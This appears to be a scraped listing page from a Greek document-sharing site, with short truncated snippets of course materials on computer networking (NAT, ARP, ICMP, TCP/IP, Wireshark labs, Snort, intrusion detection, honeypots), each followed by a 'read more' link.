Network Address Translation (NAT) HY335Α Δίκτυα Υπολογιστών Xειμερινό Εξάμηνο 2016-2017 Πανεπιστήμιο Κρήτης, Τμήμα Επιστήμης Υπολογιστών Network Address Translation (NAT) Network Layer Private IP Addresses Πρόβλημα: o χώρος των ΙΡ διευθύνσεων

Διαβάστε περισσότερα

Αρχιτεκτονικές Δικτύων & Πρωτόκολλα Ι

Αρχιτεκτονικές Δικτύων & Πρωτόκολλα Ι Αρχιτεκτονικές Δικτύων & Πρωτόκολλα Ι Ενότητα : Δίκτυα υπολογιστών - Βασικά εργαλεία δικτύων στο Linux. Όνομα Καθηγητή : Δημήτριος Λυμπερόπουλος, Σπύρος Δενάζης Τμήμα : Ηλεκτρολόγων Μηχανικών και Τεχνολογίας

Διαβάστε περισσότερα

Δίκτυα Η/Υ στην Επιχείρηση

Δίκτυα Η/Υ στην Επιχείρηση Δίκτυα Η/Υ στην Επιχείρηση Δικτυακά πρωτόκολλα και εφαρμογές, Δρομολόγηση Γκάμας Βασίλειος, Εργαστηριακός Συνεργάτης Μοντέλο πελάτη-εξυπηρετητή Προκειμένου να χρησιμοποιήσουμε μια υπηρεσία του Internet

Διαβάστε περισσότερα

ΛΕΙΤΟΥΡΓΙΚΑ ΣΥΣΤΗΜΑΤΑ. Εργαστήριο Εγκατάσταση Ubuntu με VirtualBox Εγκατάσταση Ubuntu με Unetbootin Απομακρυσμένη πρόσβαση με Putty/WinSCP

ΛΕΙΤΟΥΡΓΙΚΑ ΣΥΣΤΗΜΑΤΑ. Εργαστήριο Εγκατάσταση Ubuntu με VirtualBox Εγκατάσταση Ubuntu με Unetbootin Απομακρυσμένη πρόσβαση με Putty/WinSCP ΛΕΙΤΟΥΡΓΙΚΑ ΣΥΣΤΗΜΑΤΑ Εργαστήριο Εγκατάσταση Ubuntu με VirtualBox Εγκατάσταση Ubuntu με Unetbootin Απομακρυσμένη πρόσβαση με Putty/WinSCP Κ.Γ. Μαργαρίτης, Τμήμα Εφαρμοσμένης Πληροφορικής, Πανεπιστήμιο

Διαβάστε περισσότερα

Υλοποίηση Δικτυακών Υποδομών και Υπηρεσιών: Ρύθμιση Postfix SMTP Server, Courier IMAP, POP3 σε Ubuntu Linux

Υλοποίηση Δικτυακών Υποδομών και Υπηρεσιών: Ρύθμιση Postfix SMTP Server, Courier IMAP, POP3 σε Ubuntu Linux Υλοποίηση Δικτυακών Υποδομών και Υπηρεσιών: Ρύθμιση Postfix SMTP Server, Courier IMAP, POP3 σε Ubuntu Linux Πανεπιστήμιο Πελοποννήσου Τμήμα Επιστήμης & Τεχνολογίας Τηλεπικοινωνιών Ευάγγελος Α. Κοσμάτος

Διαβάστε περισσότερα

Ελίνα Μακρή

Ελίνα Μακρή Ελίνα Μακρή elmak@unipi.gr Απαγορεύεται η χρήση οποιουδήποτε εργαλείου ασφάλειας σε μη προστατευμένο περιβάλλον. Εύκολος εντοπισμός των IP διευθύνσεων μέσω των ISP Providers. Πρόκληση σοβαρών βλαβών στο

Διαβάστε περισσότερα

MUM ATHENS, GREECE 2015

MUM ATHENS, GREECE 2015 Presentation: Basic & Advanced RouterOS Setups (ΒΑΣΙΚΕΣ & ΠΡΟΧΩΡΗΜΕΝΕΣ ΕΓΚΑΤΑΣΤΑΣΕΙΣ ΜΕ ROUTEROS) Project Manager IonianWiFi Internet Services www.ionianwifi.gr ΠΡΩΤΗ ΕΠΑΦΗ Χρήση του Mikrotik RB951Ui-

Διαβάστε περισσότερα

ΤΕΧΝΙΚΕΣ ΕΠΙΘΕΣΗΣ (1/8)

ΤΕΧΝΙΚΕΣ ΕΠΙΘΕΣΗΣ (1/8) ΑΣΦΑΛΕΙΑ WEB CLIENT ΤΕΧΝΙΚΕΣ ΕΠΙΘΕΣΗΣ (1/8) Επίθεση άρνησης υπηρεσίας (Denial of Service-DoS). Αποστολή πολλών αιτήσεων στο µηχάνηµα-στόχο ώστε τα resources που του αποµένουν (σε αυτόν ή και στο δίκτυο).

Διαβάστε περισσότερα

Κεφάλαιο 7 Διαδικτύωση-Internet. 7.2 Τεχνολογία TCP/IP

Κεφάλαιο 7 Διαδικτύωση-Internet. 7.2 Τεχνολογία TCP/IP Κεφάλαιο 7 Διαδικτύωση-Internet 7.2 Τεχνολογία TCP/IP Τι δηλώνει ο όρος «TCP/IP»; Ο όρος TCP/IP αναφέρεται σε μια ομάδα ομοειδών πρωτοκόλλων που χρησιμοποιούνται για την επικοινωνία των δικτύων υπολογιστών

Διαβάστε περισσότερα

ΕΡΓΑΣΤΗΡΙΑΚΗ ΑΣΚΗΣΗ #3 Στρώµα ικτύου:ip Πρωτόκολλο και Πρωτόκολλα ροµολόγησης

ΕΡΓΑΣΤΗΡΙΑΚΗ ΑΣΚΗΣΗ #3 Στρώµα ικτύου:ip Πρωτόκολλο και Πρωτόκολλα ροµολόγησης ΕΡΓΑΣΤΗΡΙΑΚΗ ΑΣΚΗΣΗ #3 Στρώµα ικτύου:ip Πρωτόκολλο και Πρωτόκολλα ροµολόγησης 1. Αντικείµενο Η εργαστηριακή άσκηση αποσκοπεί στην εξοικείωση των φοιτητών µε το ζήτηµα των λογικών διαδικασιών, οι οποίες

Διαβάστε περισσότερα

Οι Διαδικτυακές ανάγκες μιας εταιρείας σε διευθύνσεις IPv4, έχουν ως εξής: Τμήμα Διοίκησης Προσωπικού & Οικονομικών Σύνολο απαιτούμενων διευθύνσεων

Οι Διαδικτυακές ανάγκες μιας εταιρείας σε διευθύνσεις IPv4, έχουν ως εξής: Τμήμα Διοίκησης Προσωπικού & Οικονομικών Σύνολο απαιτούμενων διευθύνσεων Άσκηση 1 Ethernet protocol Οι Διαδικτυακές ανάγκες μιας εταιρείας σε διευθύνσεις IPv4, έχουν ως εξής: Τμήμα Πωλήσεων Τμήμα Ανάπτυξης Προϊόντων Τμήμα Διοίκησης Προσωπικού & Οικονομικών Σύνολο απαιτούμενων

Διαβάστε περισσότερα

Δίκτυα Η/Υ ςτην Επιχείρηςη

Δίκτυα Η/Υ ςτην Επιχείρηςη Δίκτυα Η/Υ ςτην Επιχείρηςη Εντολέσ δικτυακών πρωτοκόλλων ςε Windows/Unix Γκάμασ Βαςίλειοσ, Εργαςτηριακόσ υνεργάτησ Εντολζσ δικτφου ςε Windows/Unix ε προηγούμενο εργαςτήριο παρουςιάςτηκαν οι παρακάτω εντολέσ

Διαβάστε περισσότερα

ΚΕΦΑΛΑΙΟ 1 HONEYPOTS, HONEYNETS

ΚΕΦΑΛΑΙΟ 1 HONEYPOTS, HONEYNETS ΚΕΦΑΛΑΙΟ 1 HONEYPOTS, HONEYNETS Μόνο κάποιος που γνωρίζει τις μεθόδους των επιτιθέμενων μπορεί να προστατεύσει κατάλληλα τα συστήματα του... Εισαγωγή Τα υπολογιστικά συστήματα που είναι σήμερα συνδεδεμένα

Διαβάστε περισσότερα

Δίκτυα Υπολογιστών Ενότητα 9: Dynamic Host Configuration Protocol- DHCP

Δίκτυα Υπολογιστών Ενότητα 9: Dynamic Host Configuration Protocol- DHCP Δίκτυα Υπολογιστών Ενότητα 9: Dynamic Host Configuration Protocol- DHCP Μιχάλας Άγγελος Τμήμα Μηχανικών Πληροφορικής ΤΕ Άδειες Χρήσης Το παρόν εκπαιδευτικό υλικό υπόκειται σε άδειες χρήσης Creative Commons.

Διαβάστε περισσότερα

Πρωτόκολλο ARP. Γεωργιλά Χιονία Καθηγήτρια Πληροφορικής ΠΕ1901

Πρωτόκολλο ARP. Γεωργιλά Χιονία Καθηγήτρια Πληροφορικής ΠΕ1901 Πρωτόκολλο ARP Γεωργιλά Χιονία Καθηγήτρια Πληροφορικής ΠΕ1901 Ποιο είναι το έργο του Πρωτοκόλλου Μετατροπής Διεύθυνσης (Address Resolution Protocol ARP) Κάνει δυναμική μετατροπή των IP διευθύνσεων σε φυσικές

Διαβάστε περισσότερα

Βασικά στοιχεία από τη Θεωρία

Βασικά στοιχεία από τη Θεωρία 1o ΕΠΑΛ- Ε.Κ. Συκεών -Τομέας: Ηλεκτρονικής, Ηλεκτρολογίας και Αυτοματισμού Εκπαιδευτικοί: Μπουλταδάκης Στέλιος Μαυρίδης Κώστας Δραστηριότητα: 17 Μάθημα: Εργαστήριο Δικτύων Υπολογιστών Αντικείμενο : Τα

Διαβάστε περισσότερα

ΣΥΝΔΕΣΗ ΚΑΤΑΓΡΑΦΙΚΟΥ ΣΤΟ INTERNET

ΣΥΝΔΕΣΗ ΚΑΤΑΓΡΑΦΙΚΟΥ ΣΤΟ INTERNET ΣΥΝΔΕΣΗ ΚΑΤΑΓΡΑΦΙΚΟΥ ΣΤΟ INTERNET 1) Συνδέουμε το καταγραφικό και τον Η/Υ με το ίδιο ADSL Router. 2) Έπειτα θα πρέπει να βρούμε την IP διεύθυνση που έχει το Router. Για να το κάνουμε αυτό, ακολουθούμε

Διαβάστε περισσότερα

Δίκτυα Υπολογιστών Ενότητα 10: Ethernet και ARP

Δίκτυα Υπολογιστών Ενότητα 10: Ethernet και ARP Δίκτυα Υπολογιστών Ενότητα 10: Ethernet και ARP Μιχάλας Άγγελος Τμήμα Μηχανικών Πληροφορικής ΤΕ Άδειες Χρήσης Το παρόν εκπαιδευτικό υλικό υπόκειται σε άδειες χρήσης Creative Commons. Για εκπαιδευτικό υλικό,

Διαβάστε περισσότερα

Snort. A multi-mode packet analysis tool 3-1. Ασφάλεια Δικτύων, Τμήμα Πληροφορικής, Ο.Π.Α.,

Snort. A multi-mode packet analysis tool 3-1. Ασφάλεια Δικτύων, Τμήμα Πληροφορικής, Ο.Π.Α., Snort A multi-mode packet analysis tool Ασφάλεια Δικτύων, Τμήμα Πληροφορικής, Ο.Π.Α., 3-1 Περιεχόμενα Εισαγωγή Snort Θέση στο δίκτυο Αρχιτεκτονική Snort Εντοπισμός εισβολών Κανόνες Snort Demo εκτέλεσης

Διαβάστε περισσότερα

Ασφάλεια Υπολογιστικών Συστημάτων

Ασφάλεια Υπολογιστικών Συστημάτων Ασφάλεια Υπολογιστικών Συστημάτων Ενότητα 7: Intrusion Detection Systems - Windump Νικολάου Σπύρος Τμήμα Μηχανικών Πληροφορικής ΤΕ Άδειες Χρήσης Το παρόν εκπαιδευτικό υλικό υπόκειται σε άδειες χρήσης Creative

Διαβάστε περισσότερα

ΕΓΚΑΤΑΣΤΑΣΗ ΣΥΝΔΕΣΗΣ MS L2TP VPN

ΕΓΚΑΤΑΣΤΑΣΗ ΣΥΝΔΕΣΗΣ MS L2TP VPN ΕΓΚΑΤΑΣΤΑΣΗ ΣΥΝΔΕΣΗΣ MS L2TP VPN Εισαγωγή Για την σύνδεσή μας στο εσωτερικό δίκτυο του ΕΚΕΤΑ είναι απαραίτητη η δημιουργία μιας ασφαλούς (VPN) σύνδεσης. Το πρωτόκολλο L2TP/IPSec είναι ασφαλέστερο από το

Διαβάστε περισσότερα

Draytek Vigor 2700VG Annex A

Draytek Vigor 2700VG Annex A Draytek Vigor 2700VG Annex A Από το Forum του http://www.adslgr.com/forum Όπως βλέπουμε η σύνδεσμολογία του είναι απλή και αφού το τοποθετήσουμε κάπου (είναι λίγο μεγάλο σε μέγεθος και μιάζει με σαλάχι)

Διαβάστε περισσότερα

Σενάριο Εστίασης Win XP:

Σενάριο Εστίασης Win XP: Σενάριο Εστίασης Win XP: Υλικό: 1 Η/Υ (backoffice), 1 POS, 1 router Motorola, 1 PDA. Σενάριο: Sync του backoffice με το POS και merge του POS με το PDA. Προϋποθέσεις Software: 1) BACK OFFICE : WIN XP pro,.net

Διαβάστε περισσότερα

ΤΕΧΝΟΛΟΓΙΑ ΔΙΚΤΥΩΝ ΕΠΙΚΟΙΝΩΝΙΩΝ

ΤΕΧΝΟΛΟΓΙΑ ΔΙΚΤΥΩΝ ΕΠΙΚΟΙΝΩΝΙΩΝ Επικοινωνιακό υποδίκτυο ονομάζεται το σύνολο των κόμβων που παρεμβάλλονται κατά την αποστολή ενός πακέτου από τη πηγή στο προορισμό. Το επικοινωνιακό υποδίκτυο μπορεί να βασίζεται είτε στη φιλοσοφία των

Διαβάστε περισσότερα

ΔΙΑΧΕΙΡΙΣΗ ΔΙΚΤΥΩΝ Διαχείριση Ασφαλείας (ΙΙ) Πρωτόκολλα & Αρχιτεκτονικές Firewalls Anomaly & Intrusion Detection Systems (IDS)

ΔΙΑΧΕΙΡΙΣΗ ΔΙΚΤΥΩΝ Διαχείριση Ασφαλείας (ΙΙ) Πρωτόκολλα & Αρχιτεκτονικές  Firewalls Anomaly & Intrusion Detection Systems (IDS) ΔΙΑΧΕΙΡΙΣΗ ΔΙΚΤΥΩΝ Διαχείριση Ασφαλείας (ΙΙ) Πρωτόκολλα & Αρχιτεκτονικές email Firewalls Anomaly & Intrusion Detection Systems (IDS) Β. Μάγκλαρης maglaris@netmode.ntua.gr www.netmode.ntua.gr 30/11/2015

Διαβάστε περισσότερα

Με λίγα λόγια, το TCP/IP καθορίζει τον τρόπο που πακετάρονται και μεταφέρονται τα δεδομένα της σύνδεσής μας.

Με λίγα λόγια, το TCP/IP καθορίζει τον τρόπο που πακετάρονται και μεταφέρονται τα δεδομένα της σύνδεσής μας. Γρήγορο Ίντερνετ με Κατάλληλες Ρυθμίσεις TCP/IP Η ταχύτητά μας στο ίντερνετ εξαρτάται από πολλούς παράγοντες, όπου τον κεντρικό ρόλο παίζει η σύνδεσή μας. Πολλές φορές, όμως, η σύνδεσή μας μπορεί να περιορίζεται

Διαβάστε περισσότερα

Εργαστηριακή Άσκηση 6 Πρωτόκολλα ARP και ICMP

Εργαστηριακή Άσκηση 6 Πρωτόκολλα ARP και ICMP Εργαστηριακή Άσκηση 6 Πρωτόκολλα ARP και ICMP Ο σκοπός αυτού του εργαστηρίου είναι η περαιτέρω εξέταση των πρωτοκόλλων ARP, IP και ICMP μέσω της καταγραφής και παρατήρησης των περιεχομένων των πακέτων

Διαβάστε περισσότερα

ΧΑΡΟΚΟΠΕΙΟ ΠΑΝΕΠΙΣΤΗΜΙΟ

ΧΑΡΟΚΟΠΕΙΟ ΠΑΝΕΠΙΣΤΗΜΙΟ ΧΑΡΟΚΟΠΕΙΟ ΠΑΝΕΠΙΣΤΗΜΙΟ Τμημα Πληροφορικης και Τηλεματικης Τσάμη Παναγιώτα ΑΜ: 20833 ΚΑΤΑΝΕΜΗΜΕΝΑ ΣΥΣΤΗΜΑΤΑ Άσκηση 1 Αθήνα 13-12-2011 Αναφορά Ενότητα 1 A Δημιουργήστε στο φλοιό 3 εντολές (alias) που η

Διαβάστε περισσότερα

Δίκτυα Υπολογιστών Ενότητα 7: Internet Control Message Protocol - ICMP

Δίκτυα Υπολογιστών Ενότητα 7: Internet Control Message Protocol - ICMP Δίκτυα Υπολογιστών Ενότητα 7: Internet Control Message Protocol - ICMP Μιχάλας Άγγελος Τμήμα Μηχανικών Πληροφορικής ΤΕ Άδειες Χρήσης Το παρόν εκπαιδευτικό υλικό υπόκειται σε άδειες χρήσης Creative Commons.

Διαβάστε περισσότερα

Δίκτυα Υπολογιστών Λύσεις σειράς ασκήσεων επανάληψης

Δίκτυα Υπολογιστών Λύσεις σειράς ασκήσεων επανάληψης ΕΘΝΙΚΟ ΜΕΤΣΟΒΙΟ ΠΟΛΥΤΕΧΝΕΙΟ ΣΧΟΛΗ ΗΛΕΚΤΡΟΛΟΓΩΝ ΜΗΧ/ΚΩΝ & ΜΗΧ/ΚΩΝ ΥΠΟΛΟΓΙΣΤΩΝ Τομέας Επικοινωνιών, Ηλεκτρονικής και Συστημάτων Πληροφορικής (1) Δίκτυα Υπολογιστών Λύσεις σειράς ασκήσεων επανάληψης Απρόκλητο

Διαβάστε περισσότερα

ΚΕΦΑΛΑΙΟ 4. Τεχνική Ανίχνευσης του. Πτυχιακή Εργασία Σελίδα 95

ΚΕΦΑΛΑΙΟ 4. Τεχνική Ανίχνευσης του. Πτυχιακή Εργασία Σελίδα 95 ΚΕΦΑΛΑΙΟ 4 Τεχνική Ανίχνευσης του ICMP Echo Spoofing Πτυχιακή Εργασία Σελίδα 95 Περιεχόμενα ΕΙΣΑΓΩΓΗ 98 ΜΕΡΟΣ Α: Έλεγχος του Icmp Echo Reply Πακέτου 103 A.1. Ανίχνευση του spoofed Icmp Echo Request Πακέτου.

Διαβάστε περισσότερα

Τη φυσική (MAC) διεύθυνση που δίνει ο κατασκευαστής του δικτυακού υλικού στις συσκευές του (π.χ. στις κάρτες δικτύου). Η περιοχή διευθύνσεων που

Τη φυσική (MAC) διεύθυνση που δίνει ο κατασκευαστής του δικτυακού υλικού στις συσκευές του (π.χ. στις κάρτες δικτύου). Η περιοχή διευθύνσεων που 7.7 Πρωτόκολλο ARP 1 ύο είδη διευθύνσεων: MAC - IP Τη φυσική (MAC) διεύθυνση που δίνει ο κατασκευαστής του δικτυακού υλικού στις συσκευές του (π.χ. στις κάρτες δικτύου). Η περιοχή διευθύνσεων που µπορεί

Διαβάστε περισσότερα

Εργαστήριο 4 Ασκήσεις: Διαχείριση Δικτύου (nmap, iptables) και Προχωρημένες Εντολές Unix (grep, ps, cut, find)

Εργαστήριο 4 Ασκήσεις: Διαχείριση Δικτύου (nmap, iptables) και Προχωρημένες Εντολές Unix (grep, ps, cut, find) Εργαστήριο 4 Ασκήσεις: Διαχείριση Δικτύου (nmap, iptables) και Προχωρημένες Εντολές Unix (grep, ps, cut, find) 1) Δώστε την εντολή που δείχνει τις ανοιχτές εισερχόμενες θύρες (ports) της μηχανής σας. Χρησιμοποιήστε

Διαβάστε περισσότερα

Υλοποίηση Δικτυακών Υποδομών και Υπηρεσιών: Υπηρεσία Ηλεκτρονικού Ταχυδρομείου - SMTP

Υλοποίηση Δικτυακών Υποδομών και Υπηρεσιών: Υπηρεσία Ηλεκτρονικού Ταχυδρομείου - SMTP Υλοποίηση Δικτυακών Υποδομών και Υπηρεσιών: Υπηρεσία Ηλεκτρονικού Ταχυδρομείου - SMTP Δρ. Απόστολος Γκάμας Διδάσκων (407/80) gkamas@uop.gr Υλοποίηση Δικτυακών Υποδομών και Υπηρεσιών Διαφάνεια 1 1 Ηλεκτρονικό

Διαβάστε περισσότερα

Εργαστήριο Ethereal: ICMP

Εργαστήριο Ethereal: ICMP Εργαστήριο Ethereal: ICMP Έκδοση:1.0 2005 J.F. Kurose, K.W. Ross Μετάφραση - Απόδοση: Σ. Τσακιρίδου Computer Networking: A Top-Down Approach Featuring the Internet Στο εργαστήριο αυτό θα εξετάσουµε µερικά

Διαβάστε περισσότερα

Εγχειρίδιο εγκατάστασης και βασικής παραμετροποίησης σεναρίου εστίασης

Εγχειρίδιο εγκατάστασης και βασικής παραμετροποίησης σεναρίου εστίασης Εγχειρίδιο εγκατάστασης και βασικής παραμετροποίησης σεναρίου εστίασης Σε αυτό το εγχειρίδιο θα καλύψουμε τη μεθοδολογία εγκατάστασης ενός σεναρίου εστίασης από την αρχή έως το σημείο των βασικών ρυθμίσεων

Διαβάστε περισσότερα

α) η καταγραφή και η σύλληψη της δικτυακής κίνησης (capture) και β) η ανάλυση της δικτυακής κίνησης.

α) η καταγραφή και η σύλληψη της δικτυακής κίνησης (capture) και β) η ανάλυση της δικτυακής κίνησης. Εργαστηριακή Άσκηση 3 Σκοπός της τρίτης σειράς ασκήσεων είναι η γνωριµία µε τον αναλυτή πρωτοκόλλων Wireshark. Το πρόγραµµα Wireshark είναι ένας ανιχνευτής πακέτων (packet sniffer) και διατίθεται ως ανοιχτό

Διαβάστε περισσότερα

Οδηγίες Σύνδεσης Ασύρματου Δικτύου ΤΜΗΥ&Π. Οδηγίες Σύνδεσης για λοιπά Linux/Unix Συστήματα

Οδηγίες Σύνδεσης Ασύρματου Δικτύου ΤΜΗΥ&Π. Οδηγίες Σύνδεσης για λοιπά Linux/Unix Συστήματα Οδηγίες Σύνδεσης Ασύρματου Δικτύου ΤΜΗΥ&Π Περιεχόμενα: 1. 1. Εισαγωγικές Πληροφορίες 2. Οδηγίες Σύνδεσης για Windows XP/Vista 3. Οδηγίες Σύνδεσης για Windows 7 4. Οδηγίες Σύνδεσης για MAC OS 5. Οδηγίες

Διαβάστε περισσότερα

7.2.2 Σχέση OSI και TCP/IP

7.2.2 Σχέση OSI και TCP/IP Κεφάλαιο 7 7.2.2 Σχέση OSI και TCP/IP Σελ. 226-230 Γεώργιος Γιαννόπουλος ΠΕ19, ggiannop (at) sch.gr ΕΣΠΕΡΙΝΟ ΕΠΑΛ Κομοτηνής http://diktya-epal-g.ggia.info/ Γνωστό μοντέλο OSI διασύνδεσης ανοικτών συστημάτων.

Διαβάστε περισσότερα

ΕΡΓΑΣΤΗΡΙΑΚΗ ΑΣΚΗΣΗ #2 Ethernet MAC Στρώµα

ΕΡΓΑΣΤΗΡΙΑΚΗ ΑΣΚΗΣΗ #2 Ethernet MAC Στρώµα ΕΡΓΑΣΤΗΡΙΑΚΗ ΑΣΚΗΣΗ #2 Ethernet MAC Στρώµα 1. Αντικείµενο Η εργαστηριακή άσκηση αποσκοπεί στην εξοικείωση των φοιτητών µε το ζήτηµα των λογικών διαδικασιών, οι οποίες υλοποιούνται στο επίπεδο του στρώµατος

Διαβάστε περισσότερα

Εργαστήριο 3. Εγκατάσταση LAMP Stack στο AWS

Εργαστήριο 3. Εγκατάσταση LAMP Stack στο AWS Εργαστήριο 3 Εγκατάσταση LAMP Stack στο AWS ΕΠΛ425 - Τεχνολογίες Διαδικτύου Χειμερινό Εξάμηνο 201 Τί είναι ένας LAMP Server; Αποτελεί ένα πρότυπο μοντέλο για Web Services. Το ακρώνυμο αντιστοιχεί μέ: Linux

Διαβάστε περισσότερα

ΜΕΤΑΦΟΡΑ ΑΡΧΕΙΩΝ FTP

ΜΕΤΑΦΟΡΑ ΑΡΧΕΙΩΝ FTP ΜΕΤΑΦΟΡΑ ΑΡΧΕΙΩΝ FTP Το FTP (File Transfer Protocol) είναι το εξειδικευμένο πρωτόκολλο μεταφοράς αρχείων στα σύγχρονα δίκτυα δεδομένων όπως το Διαδίκτυο. Δίνει τη δυνατότητα μεταφοράς αρχείων από τον υπολογιστή

Διαβάστε περισσότερα

ΚΕΦΑΛΑΙΟ 3 ICMP Echo Spoofing

ΚΕΦΑΛΑΙΟ 3 ICMP Echo Spoofing ΚΕΦΑΛΑΙΟ 3 ICMP Echo Spoofing Πτυχιακή Εργασία Σελίδα 67 Περιεχόμενα ΕΙΣΑΓΩΓΗ. 69 ΜΕΡΟΣ Α: To Icmp Πρωτόκολλο.... 70 Γενικά. 70 Το Icmp Echo Πακέτο. 72 Το Icmp Destination Unreachable Πακέτο. 75 ΜΕΡΟΣ

Διαβάστε περισσότερα

Ethernet Ethernet ΙΕΕΕ CSMA/CD

Ethernet Ethernet ΙΕΕΕ CSMA/CD Ethernet Τα τοπικά δίκτυα είναι συνήθως τύπου Ethernet ή λέμε ότι ακολουθούν το πρότυπο ΙΕΕΕ 802.3 Ακολουθούν το μηχανισμό CSMA/CD (Πολλαπλή πρόσβαση με Ακρόαση Φέροντος και Ανίχνευση Συγκρούσεων). Πολλαπλή

Διαβάστε περισσότερα

ΤΜΗΜΑ ΕΚΠΑΙΔΕΥΤΙΚΗΣ ΥΠΟΛΟΓΙΣΤΙΚΗΣ ΥΠΟΔΟΜΗΣ ΜΗΧΑΝΟΓΡΑΦΙΚΟ ΚΕΝΤΡΟ

ΤΜΗΜΑ ΕΚΠΑΙΔΕΥΤΙΚΗΣ ΥΠΟΛΟΓΙΣΤΙΚΗΣ ΥΠΟΔΟΜΗΣ ΜΗΧΑΝΟΓΡΑΦΙΚΟ ΚΕΝΤΡΟ ΠΟΛΥΤΕΧΝΕΙΟ ΚΡΗΤΗΣ ΤΜΗΜΑ ΕΚΠΑΙΔΕΥΤΙΚΗΣ ΥΠΟΛΟΓΙΣΤΙΚΗΣ ΥΠΟΔΟΜΗΣ ΜΗΧΑΝΟΓΡΑΦΙΚΟ ΚΕΝΤΡΟ Πολυτεχνειούπολη Ακρωτηρίου, Χανιά, 73100 Τηλ.: 28210 37400 (κεντρικό), 28210 37766 (κτίριο ΜΗΠΕΡ), Fax: 28210 37571 e-mail:

Διαβάστε περισσότερα

3.3 Πρωτόκολλα ανεύρεσης και απόδοσης διευθύνσεων, Address Resolution Protocol (ARP) και Dynamic Host Configuration Protocol (DHCP)

3.3 Πρωτόκολλα ανεύρεσης και απόδοσης διευθύνσεων, Address Resolution Protocol (ARP) και Dynamic Host Configuration Protocol (DHCP) 3.3 Πρωτόκολλα ανεύρεσης και απόδοσης διευθύνσεων, Address Resolution Protocol (ARP) και Dynamic Host Configuration Protocol (DHCP) 1 / 32 Σε έναν κόμβο ο οποίος επιθυμεί να αποστείλει δεδομένα σε κάποιον

Διαβάστε περισσότερα

Ενεργοποίηση του πρωτοκόλλου IPv6

Ενεργοποίηση του πρωτοκόλλου IPv6 Ενεργοποίηση του πρωτοκόλλου IPv6 Στις επόµενες παραγράφους περιγράφουµε τα βασικά βήµατα που πρέπει να ακολουθήσει ο τελικός χρήσης για µια αντιπροσωπευτική οµάδα λειτουργικών συστηµάτων ώστε να συνδεθεί

Διαβάστε περισσότερα

Διαδίκτυα και το Διαδίκτυο (Internetworking and the Internet)

Διαδίκτυα και το Διαδίκτυο (Internetworking and the Internet) Διαδίκτυα και το Διαδίκτυο (Internetworking and the Internet) Περίληψη Πως τα διάφορα δίκτυα διαφέρουν μεταξύ τους Πως συνδέονται ανομοιογενή δίκτυα μεταξύ τους Εικονικά κυκλώματα συνδεδεμένα σε σειρά

Διαβάστε περισσότερα

Σχεδιασμός Εικονικών Δικτύων Ενότητα 7: Μεταγλώττιση διευθύνσεων (ΝΑΤ)

Σχεδιασμός Εικονικών Δικτύων Ενότητα 7: Μεταγλώττιση διευθύνσεων (ΝΑΤ) Σχεδιασμός Εικονικών Δικτύων Ενότητα 7: Μεταγλώττιση διευθύνσεων (ΝΑΤ) Νικολάου Σπύρος Τμήμα Μηχανικών Πληροφορικής ΤΕ Άδειες Χρήσης Το παρόν εκπαιδευτικό υλικό υπόκειται σε άδειες χρήσης Creative Commons.

Διαβάστε περισσότερα

PortSip Softphone. Ελληνικά Ι English 1/20

PortSip Softphone. Ελληνικά Ι English 1/20 PortSip Softphone Ελληνικά Ι English 1/20 1. Περιεχόμενα 2. Εγκατάσταση σε Smartphone & Tablet (Android ή ios)... 1 3. Εγκατάσταση σε ηλεκτρονικό υπολογιστή (Windows ή Mac).... 5 4. Installation in Smartphone

Διαβάστε περισσότερα

ΚΕΦΑΛΑΙΟ 1.7. Πρωτόκολλα και Αρχιτεκτονική Δικτύου

ΚΕΦΑΛΑΙΟ 1.7. Πρωτόκολλα και Αρχιτεκτονική Δικτύου ΚΕΦΑΛΑΙΟ 1.7 Πρωτόκολλα και Αρχιτεκτονική Δικτύου Επικοινωνία δύο σταθμών Ύπαρξη διαδρομής Αποκατάσταση σύνδεσης Ο σταθμός-πηγή πρέπει να ξέρει πότε ο σταθμός-προορισμός είναι έτοιμος να λάβει δεδομένα.

Διαβάστε περισσότερα

Βασικές Έννοιες Web Εφαρμογών

Βασικές Έννοιες Web Εφαρμογών ΟΙΚΟΝΟΜΙΚΟ ΠΑΝΕΠΙΣΤΗΜΙΟ ΑΘΗΝΩΝ ΤΜΗΜΑ ΔΙΟΙΚΗΤΙΚΗΣ ΕΠΙΣΤΗΜΗΣ ΚΑΙ ΤΕΧΝΟΛΟΓΙΑΣ Τεχνολογίες και Εφαρμογές Διαδικτύου Βασικές Έννοιες Web Εφαρμογών Κατερίνα Πραματάρη Τεχνολογίες και Εφαρμογές Διαδικτύου Περιεχόμενα

Διαβάστε περισσότερα

Πρωτόκολλα Διαδικτύου (ΨΣ-326 DS151)

Πρωτόκολλα Διαδικτύου (ΨΣ-326 DS151) Πρωτόκολλα Διαδικτύου (ΨΣ-326 DS151) 2 Η ΕΡΓΑΣΤΗΡΙΑΚΗ ΔΙΑΛΕΞΗ (WIRESHARK ΠΡΩΤΟΚΟΛΛΑ ΕΦΑΡΜΟΓΗΣ) Υπεύθυνος καθηγητής: Άγγελος Ρούσκας Βοηθός: Υ.Δ. Ευθύμης Οικονόμου 1 Περιεχόμενα παρουσίασης HTTP συνέχεια

Διαβάστε περισσότερα

Διαμόρφωση και έλεγχος του δικτύου

Διαμόρφωση και έλεγχος του δικτύου Εργαστήριο 8 ΤΕΙ ΘΕΣΣΑΛΟΝΙΚΗΣ - ΤΜΗΜΑ ΠΛΗΡΟΦΟΡΙΚΗΣ ΜΑΘΗΜΑ: ΔΙΚΤΥΑ Η/Υ Διαμόρφωση και έλεγχος του δικτύου Στόχος Ο στόχος αυτού του εργαστηρίου είναι η κατανόηση και εξοικείωση με τα εργαλεία διαμόρφωσης

Διαβάστε περισσότερα

Μεταφορά Αρχείων µε χρήση της Υπηρεσίας FTP σελ. 1

Μεταφορά Αρχείων µε χρήση της Υπηρεσίας FTP σελ. 1 Μεταφορά Αρχείων µε χρήση της Υπηρεσίας FTP Περιεχόµενα Τι είναι η υπηρεσία FTP;...2 FTP από τη γραµµή εντολών των Windows...2 Το πρόγραµµα WS-FTP...4 Μεταφορά Αρχείων µε χρήση της Υπηρεσίας FTP σελ. 1

Διαβάστε περισσότερα

Εισαγωγή στο TCP/IP. Π. Γαλάτης

Εισαγωγή στο TCP/IP. Π. Γαλάτης Εισαγωγή στο TCP/IP Π. Γαλάτης H σουίτα πρωτοκόλλου TCP/IP Το TCP/IP είναι ένα σύνολο πρωτοκόλλων που ονομάζουμε σουίτα και αφορούν στη δικτύωση των υπολογιστών. Transmission Control Protocol (TCP) μετάδοση

Διαβάστε περισσότερα

Οδηγίες προς τον τελικό χρήστη για τη σύνδεση στο Ασύρματο Δίκτυο Δεδομένων του ΤΜΗΥ&Π

